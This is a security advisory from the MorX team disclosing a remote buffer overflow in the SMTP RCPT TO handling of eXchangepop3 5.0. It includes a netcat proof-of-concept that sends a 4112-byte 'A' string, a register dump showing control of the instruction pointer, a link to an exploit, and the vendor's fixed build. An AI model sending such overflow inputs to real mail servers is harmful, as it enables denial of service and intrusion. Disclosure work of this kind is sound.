Author: securma massine <securma (at) morx (dot) org [email concealed]>
MorX Security Research Team
http://www.morx.org
Product info :
EXchangepop3 is an email gateway (connector) that retrieves messages from
Internet POP3 email accounts and delivers them to Exchange Server.
Vulnerability Description:
eXchangepop3 is vulnerable to buffer overflow attack.
boundary errors in the handling of the RCPT TO (smtp) commands by sending a
large buffer, allow remote users to set a new Instruction Pointer to execute
arbitrary code and gain access on system.
C:>nc 127.0.0.1 25
220 aaa ESMTP
mail [enter]
250 OK
rcpt to:<AAAAAA....("A"x4112)
we have :
eax=00000001 ebx=007334e0 ecx=41414141 edx=7c91eb94 esi=00455a38
edi=0f010001
eip=41414141 esp=0221f750 ebp=00000001 iopl=0 nv up ei pl nz ac po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000
efl=00010216
41414141 ?? ???
Affected Software(s):
Exchangepop3 v 5.0 (build 050203)
Affected platform(s):
Windows
Exploit/Proof of Concept:
http://www.morx.org/expl5.txt
Solution :
The vendor has released a new build fixing the problem :
The build number is 060125.
http://www.exchangepop3.com/
History:
14/01/2006 initial vendor contact
16/01/2006 vendor received details about the vulnerabilty
02/02/2006 vendor released the fixed build
Disclaimer:
this entire document is for eductional, testing and demonstrating purpose
only.
Greets:
Greets to undisputed and all MorX members.